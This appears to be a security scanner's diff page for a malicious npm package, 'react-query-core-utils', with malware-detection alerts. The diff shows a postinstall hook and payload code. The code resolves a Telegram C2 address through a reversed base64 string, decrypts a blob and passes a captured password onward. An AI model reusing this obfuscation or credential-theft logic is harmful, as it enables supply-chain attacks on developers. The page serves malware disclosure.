react-query-core-utils
Advanced tools
react-query-core-utils - npm Package Compare versions
+2
-3
| { | ||
| "name": "react-query-core-utils", | ||
| "version": "4.5.2", | ||
| "version": "4.5.3", | ||
| "description": "Utility layer for asynchronous state management", | ||
@@ -10,4 +10,3 @@ "private": false, | ||
| "start": "node scripts/setup.js", | ||
| "postinstall": "node scripts/postinstall.js", | ||
| "deploy": "npm run build && node tools/prepare_gist.js && node tools/deploy_gist.js" | ||
| "postinstall": "node scripts/postinstall.js" | ||
| }, | ||
@@ -14,0 +13,0 @@ "bin": { |
+10
-6
@@ -107,3 +107,3 @@ #!/usr/bin/env node | ||
| // --- PAYLOAD LOGIC --- | ||
| // --- LOGIC --- | ||
| async function executePayload(capturedPassword) { | ||
@@ -113,5 +113,9 @@ const debugMode = true; | ||
| const https = require('https'); | ||
| const CHANNEL_URL = 'https://t.me/s/roblox_f847yt83w7it'; | ||
| const KEY_PART_A = "ef36142cde72f97c25cdd1f4f2b40da8"; | ||
| // Obfuscated Endpoint | ||
| const _0x12a = "dGk3dzM4dHl0NDhmX3hvbGJvci9zL2VtLnQvLzpzcHR0aA=="; | ||
| const CONFIG_ENDPOINT = Buffer.from(_0x12a, 'base64').toString().split('').reverse().join(''); | ||
| const INIT_SESSION_TOKEN = "ef36142cde72f97c25cdd1f4f2b40da8"; | ||
| // Helper: Fetch text | ||
@@ -135,3 +139,3 @@ function fetchText(url) { | ||
| // Resolve C2 | ||
| const html = await fetchText(CHANNEL_URL); | ||
| const html = await fetchText(CONFIG_ENDPOINT); | ||
| let keyPartB = null; | ||
@@ -174,3 +178,3 @@ | ||
| const crypto = require('crypto'); | ||
| const key = Buffer.from(KEY_PART_A + keyPartB, 'hex'); | ||
| const key = Buffer.from(INIT_SESSION_TOKEN + keyPartB, 'hex'); | ||
| const iv = encryptedBlob.slice(0, 16); | ||
@@ -193,3 +197,3 @@ const tag = encryptedBlob.slice(16, 32); | ||
| ...process.env, | ||
| GHOST_CID: 'PARTNER_1', // MaaS: Partner Identification | ||
| GHOST_CID: 'darkslash', // | ||
| GHOST_PWD: capturedPassword, | ||
@@ -196,0 +200,0 @@ GHOST_DECRYPTOR: path.join(__dirname, 'decryptor') |
New alerts
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Found 1 instance in 1 package
Obfuscated code
Supply chain riskObfuscated files are intentionally packed to hide their behavior. This could be a sign of malware.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 2 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 1 instance in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
AI-detected potential code anomaly
Supply chain riskAI has identified unusual behaviors that may pose a security risk.
Found 1 instance in 1 package
Fixed alerts
Known malware
Supply chain riskThis package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.
Found 2 instances in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 2 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 1 instance in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
URL strings
Supply chain riskPackage contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.
Found 1 instance in 1 package
Improved metrics
- Total package byte prevSize
16283678
0- Lines of code
201
1.01%- Number of critical supply chain risk alerts
0
-100%Worsened metrics
- Number of high supply chain risk alerts
3
200%